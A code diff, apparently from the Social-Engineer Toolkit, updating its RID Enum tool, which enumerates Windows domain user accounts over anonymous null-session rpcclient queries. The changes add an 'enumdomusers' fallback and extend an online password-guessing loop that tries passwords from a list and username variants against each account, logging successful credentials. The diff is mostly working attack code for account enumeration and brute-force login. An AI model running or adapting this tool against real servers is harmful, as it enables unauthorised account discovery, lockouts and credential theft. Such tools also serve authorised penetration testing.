Updated RIDENUM to latest version

readme/CHANGES

@@ -1,3 +1,9 @@
+~~~~~~~~~~~~~~~~
+version 5.4.7
+~~~~~~~~~~~~~~~~
+
+* added latest version and changes of RIDENUM to SET
+
 ~~~~~~~~~~~~~~~~
 version 5.4.6
 ~~~~~~~~~~~~~~~~

src/core/setcore.py

@@ -229,7 +229,7 @@ def print_error(message):
     print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
 
 def get_version():
-    define_version = '5.4.6'
+    define_version = '5.4.7'
     return define_version
 
 class create_menu:

src/fasttrack/rid_enum.py

@@ -5,7 +5,7 @@ import sys
 #############################################################################################################
 #
 # RID Enum
-# RID Cycling Tool 
+# RID Cycling Tool
 #
 # Written by: David Kennedy (ReL1K)
 # Website: https://www.trustedsec.com
@@ -50,6 +50,8 @@ Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file>
 """
     sys.exit()
 
+# for nt-status-denied
+denied = 0
 
 # attempt to use lsa query first
 def check_user_lsa(ip):
@@ -89,7 +91,7 @@ def sids_to_names(ip, sid, start, stop):
     # different chunk size for darwin (os x)
     chunk_size = 2500
     if sys.platform == 'darwin':
-      chunk_size = 5000
+        chunk_size = 5000
     chunks = list(chunk(ranges, chunk_size))
     for c in chunks:
         command = 'rpcclient -U "" %s -N -c "lookupsids ' % ip
@@ -98,21 +100,25 @@ def sids_to_names(ip, sid, start, stop):
         proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE, shell=True)
         stdout_value = proc.communicate()[0]
-        if "NT_STATUS_ACCESS_DENIED" in stdout_value: 
-            print "[![ Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
+        if "NT_STATUS_ACCESS_DENIED" in stdout_value:
+            print "[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users."
+            global denied
+            denied = 1
+
             break
         for line in stdout_value.rstrip().split('\n'):
             if not "*unknown*" in line:
-                rid_account = line.split(" ", 1)[1]
-                # will show during an unhandled request
-                # '00000' are bogus accounts?
-                # only return accounts ie. (1). Everything else should be a group
-                if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
-                    # here we join based on spaces, for example 'Domain Admins' needs to be joined
-                    rid_account = rid_account.replace("(1)", "")
-                    # return the full domain\username
-                    rid_account = rid_account.rstrip()
-                    rid_accounts.append(rid_account)
+                if line != "":
+                    rid_account = line.split(" ", 1)[1]
+                    # will show during an unhandled request
+                    # '00000' are bogus accounts?
+                    # only return accounts ie. (1). Everything else should be a group
+                    if rid_account != "request" and '00000' not in rid_account and '(1)' in rid_account:
+                        # here we join based on spaces, for example 'Domain Admins' needs to be joined
+                        rid_account = rid_account.replace("(1)", "")
+                        # return the full domain\username
+                        rid_account = rid_account.rstrip()
+                        rid_accounts.append(rid_account)
     return rid_accounts
 
 # capture initial input
@@ -185,8 +191,8 @@ try:
                 sid = sid[:-4]
                 # we has no sids :( exiting
             if sid == False:
-                print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
-                sys.exit()
+                denied = 1
+                print "[!] Failed to enumerate SIDs, pushing on to another method."
 
         print "[*] Enumerating user accounts.. This could take a little while."
         # assign rid start and stop as integers
@@ -209,7 +215,41 @@ try:
                 filewrite.write(name + "\n")
         # close the file
         filewrite.close()
-        print "[*] RID_ENUM has finished enumerating user accounts..."
+        if denied == 0:
+            print "[*] RID_ENUM has finished enumerating user accounts..."
+
+        # if we failed all other methods, we'll move to enumdomusers
+        if denied == 1:
+            print "[*] Attempting enumdomusers to enumerate users..."
+            proc = subprocess.Popen("rpcclient -U '' -N %s -c 'enumdomusers'" % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
+            filewrite = file("%s_users.txt" % ip, "a")
+            counter = 0
+            for line in iter(proc.stdout.readline, ''):
+                counter = 1
+                if line != '':
+                    if "user:" in line:
+                        # cycle through
+                        line = line.split("rid:")
+                        line = line[0].replace("user:[", "").replace("]", "")
+                        print line
+                        filewrite.write(line + "\n")
+                    else:
+                        denied = 2
+                        break
+                else:
+                    if counter == 0:
+                        break
+
+            # if we had nothing to pull
+            if counter == 0:
+                denied = 2
+
+            if denied == 2:
+                print "[!] Sorry. RID_ENUM failed to successfully enumerate users. Bummers."
+
+            if denied == 1:
+                filewrite.close()
+                print "[*] Finished dumping users, saved to %s_users.txt." % (ip)
 
     # if we specified a password list
     if passwords:
@@ -239,21 +279,28 @@ try:
                     # if we specify a lowercase username
                     if password == "lc username":
                         try:
-                            password = user.split("\\")[1]
-                            password = password.lower()
+                            if "\\" in password:
+                                password = user.split("\\")[1]
+                                password = password.lower()
+                            # if domain isn't specified
+                            else: password = user.lower()
                         except: pass
                     # if we specify a uppercase username
                     if password == "uc username":
                         try:
-                            password = user.split("\\")[1]
-                            password = password.upper()
+                            if "\\" in password:
+                                password = user.split("\\")[1]
+                                password = password.upper()
+                            else: password = user.lower()
                         except: pass
                     child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
                     i = child.expect(['LOGON_FAILURE', 'rpcclient', 'NT_STATUS_ACCOUNT_EXPIRED',
-                                      'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED'])
+                                      'NT_STATUS_ACCOUNT_LOCKED_OUT', 'NT_STATUS_PASSWORD_MUST_CHANGE', 'NT_STATUS_ACCOUNT_DISABLED', 'NT_STATUS_LOGON_TYPE_NOT_GRANTED', 'NT_STATUS_BAD_NETWORK_NAME', 'NT_STATUS_CONNECTION_REFUSED'])
 
                     # login failed for this one
                     if i == 0:
+                        if "\\" in password:
+                            password = password.split("\\")[1]
                         print "Failed guessing username of %s and password of %s" % (user, password)
                         child.kill(0)
 
@@ -266,8 +313,7 @@ try:
 
                     # if account expired
                     if i == 2:
-                        print "[-] Successfully guessed username: %s with password of: %s \
-                              however, it is set to expired." % (user, password)
+                        print "[-] Successfully guessed username: %s with password of: %s however, it is set to expired." % (user, password)
                         filewrite.write("username: %s password: %s\n" % (user, password))
                         success = True
                         child.kill(0)
@@ -277,6 +323,20 @@ try:
                         print "[!] Careful. Received a NT_STATUS_ACCOUNT_LOCKED_OUT was detected.. \
                                You may be locking accounts out!"
                         child.kill(0)
+
+                    # if account change is needed
+                    if i == 4:
+                        print "[*] Successfully guessed password but needs changed. Username: %s with password of: %s" % (user,password)
+                        filewrite.write("CHANGE PASSWORD NEEDED - username: %s password: %s\n" % (user, password))
+                        success = True
+                        child.kill(0)
+
+                    if i ==8:
+                        print "[!] Unable to connect to the server. Try again or check networking settings."
+                        print "[!] Exiting RIDENUM..."
+                        success = False
+                        sys.exit()
+
         filewrite.close()
         # if we got lucky
         if success: